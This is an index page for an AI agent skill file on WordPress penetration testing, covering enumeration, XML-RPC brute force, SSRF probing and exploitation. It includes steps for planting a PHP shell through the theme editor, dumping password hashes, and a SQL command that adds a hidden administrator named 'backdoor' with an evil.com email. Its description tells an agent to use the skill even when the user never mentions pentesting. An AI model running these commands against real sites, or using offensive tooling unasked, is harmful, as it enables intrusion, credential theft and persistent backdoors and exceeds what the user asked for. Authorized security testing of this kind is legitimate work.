OpenSkillIndex← back to search

Hacktricks-skills wordpress-pentest

Perform comprehensive WordPress security assessments including enumeration, vulnerability testing, and exploitation. Use this skill whenever the user needs to assess WordPress security, test for common WordPress vulnerabilities, enumerate WordPress sites, check for outdated plugins/themes, test XML-RPC attacks, or perform any WordPress-related penetration testing. Make sure to use this skill for any WordPress security testing, even if the user doesn't explicitly mention 'pentest' or 'security assessment'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/wordpress/SKILL.MD
source content

WordPress Pentesting Skill

A comprehensive skill for conducting WordPress security assessments, from initial enumeration through exploitation and post-exploitation.

When to Use This Skill

Use this skill when:

  • Assessing WordPress site security
  • Enumerating WordPress installations (version, plugins, themes, users)
  • Testing for common WordPress vulnerabilities
  • Checking for outdated or vulnerable plugins/themes
  • Testing XML-RPC functionality and attacks
  • Performing WordPress-specific penetration testing
  • Auditing WordPress configurations

Workflow Overview

  1. Reconnaissance - Gather information about the target
  2. Enumeration - Discover WordPress components and users
  3. Vulnerability Testing - Check for known vulnerabilities
  4. Exploitation - Attempt to gain access (if authorized)
  5. Post-Exploitation - Extract data and maintain access

Phase 1: Reconnaissance

Check WordPress Installation

First, verify the target is running WordPress:

# Check for WordPress-specific files
curl -I https://target.com/wp-login.php
curl -I https://target.com/wp-admin/
curl -I https://target.com/xmlrpc.php
curl -I https://target.com/wp-json/

Get WordPress Version

Use 

scripts/wp-enumerate.sh
to extract version information:

./scripts/wp-enumerate.sh https://target.com

Manual methods:

# Check readme.html or license.txt
curl -s https://target.com/readme.html | grep -i version
curl -s https://target.com/license.txt | head -5

# Check meta tags
curl -s https://target.com/ | grep -i 'content="WordPress'

# Check CSS/JS version strings
curl -s https://target.com/ | grep -E 'wp-content.*ver='

Phase 2: Enumeration

Enumerate Plugins and Themes

Use the enumeration script:

./scripts/wp-enumerate.sh https://target.com --plugins --themes

Manual enumeration:

# Extract plugins from page source
curl -s https://target.com/ | grep -E 'wp-content/plugins/' | sed -E 's,.*wp-content/plugins/([^/"\'>]+).*,\1,' | sort -u

# Extract themes from page source
curl -s https://target.com/ | grep -E 'wp-content/themes/' | sed -E 's,.*wp-content/themes/([^/"\'>]+).*,\1,' | sort -u

# Extract version strings
curl -s https://target.com/ | grep -E '?ver=' | sed -E 's,.*ver=([^&"\'>]+).*,\1,' | sort -u

User Enumeration

Use 

scripts/wp-user-enum.sh
for automated user discovery:

./scripts/wp-user-enum.sh https://target.com

Manual methods:

# Author ID brute force (check IDs 1-50)
for i in {1..50}; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/?author=$i")
  if [[ "$code" =~ ^[23][0-9][0-9]$ ]]; then
    echo "Valid user ID: $i"
  fi
done

# Check wp-json endpoint
curl -s https://target.com/wp-json/wp/v2/users/

# Check oembed endpoint (requires a post URL)
curl -s "https://target.com/wp-json/oembed/1.0/embed?url=https://target.com/sample-post/"

Check Login Paths

# Common WordPress login paths
for path in "/wp-login.php" "/wp-admin/" "/wp-admin/login.php" "/login/" "/login.php"; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path")
  echo "$path: $code"
done

Phase 3: Vulnerability Testing

XML-RPC Testing

Use 

scripts/wp-xmlrpc-test.sh
to test XML-RPC functionality:

./scripts/wp-xmlrpc-test.sh https://target.com

Manual XML-RPC checks:

# Check if XML-RPC is enabled
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: application/xml" \
  -d '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' | grep -i "system.listMethods"

# Check for pingback.ping (potential DDoS)
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: application/xml" \
  -d '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' | grep -i "pingback.ping"

Check for Known Vulnerabilities

Use 

scripts/wp-vuln-check.sh
to scan for common vulnerabilities:

./scripts/wp-vuln-check.sh https://target.com

Test Common Attack Vectors

# Test wp-cron.php DoS potential
curl -s -o /dev/null -w "%{http_code}" https://target.com/wp-cron.php

# Test oembed proxy SSRF
curl -s "https://target.com/wp-json/oembed/1.0/proxy?url=http://your-collaborator.com"

# Check for exposed wp-config.php
curl -s https://target.com/wp-config.php | grep -i "DB_PASSWORD"

Phase 4: Exploitation

Credential Attacks

If you have valid usernames, test with common passwords:

# Using wpscan (requires API token)
wpscan --url https://target.com --api-token YOUR_TOKEN --passwords /path/to/wordlist.txt

# Using XML-RPC for credential brute force
./scripts/wp-xmlrpc-brute.sh https://target.com userlist.txt passlist.txt

Plugin Vulnerability Exploitation

Check for vulnerable plugins and use appropriate exploits:

# Check plugin versions against known vulnerabilities
./scripts/wp-vuln-check.sh https://target.com --detailed

# Common vulnerable plugins to check:
# - Litho Theme (file deletion)
# - WP Job Portal (SQLi, file download)
# - Jobmonster Theme (account takeover)
# - Motors Theme (plugin installation)
# - Depicter Slider (SQLi)
# - Kubio AI (LFI)

RCE via Theme Editor

If you have admin access:

# Upload shell via theme editor
# Navigate to: Appearance → Theme Editor → 404 Template
# Replace with PHP shell code

# Access the shell at:
# https://target.com/wp-content/themes/active-theme/404.php

Phase 5: Post-Exploitation

Extract User Data

# Extract usernames and password hashes
mysql -u <user> -p<pass> -h localhost -e "use wordpress; SELECT user_login, user_pass FROM wp_users;"

# Change admin password
mysql -u <user> -p<pass> -h localhost -e "use wordpress; UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID = 1;"

Maintain Access

# Create backdoor plugin
# Upload malicious plugin via dashboard
# Or modify theme files

# Create new admin user
mysql -u <user> -p<pass> -h localhost -e "use wordpress; INSERT INTO wp_users (user_login, user_pass, user_email, user_registered) VALUES ('backdoor', MD5('password'), 'backdoor@evil.com', NOW()); INSERT INTO wp_usermeta (user_id, meta_key, meta_value) SELECT ID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM wp_users WHERE user_login='backdoor';"

Security Recommendations

After assessment, recommend:

  1. Keep WordPress Updated

    • Enable auto-updates in wp-config.php
    • Regularly update plugins and themes

  2. Security Plugins

    • Wordfence Security
    • Sucuri Security
    • iThemes Security

  3. Hardening

    • Remove default admin user
    • Use strong passwords and 2FA
    • Limit login attempts
    • Disable XML-RPC if not needed
    • Rename wp-admin access

Scripts Reference

ScriptPurpose
wp-enumerate.sh
Extract version, plugins, themes
wp-user-enum.sh
Enumerate WordPress users
wp-xmlrpc-test.sh
Test XML-RPC functionality
wp-xmlrpc-brute.sh
Brute force via XML-RPC
wp-vuln-check.sh
Check for known vulnerabilities

Important Notes

  • Authorization Required: Only perform these tests on systems you own or have explicit permission to test
  • Legal Compliance: Ensure all testing complies with applicable laws and regulations
  • Documentation: Document all findings and maintain evidence
  • Responsible Disclosure: Report vulnerabilities to site owners appropriately

References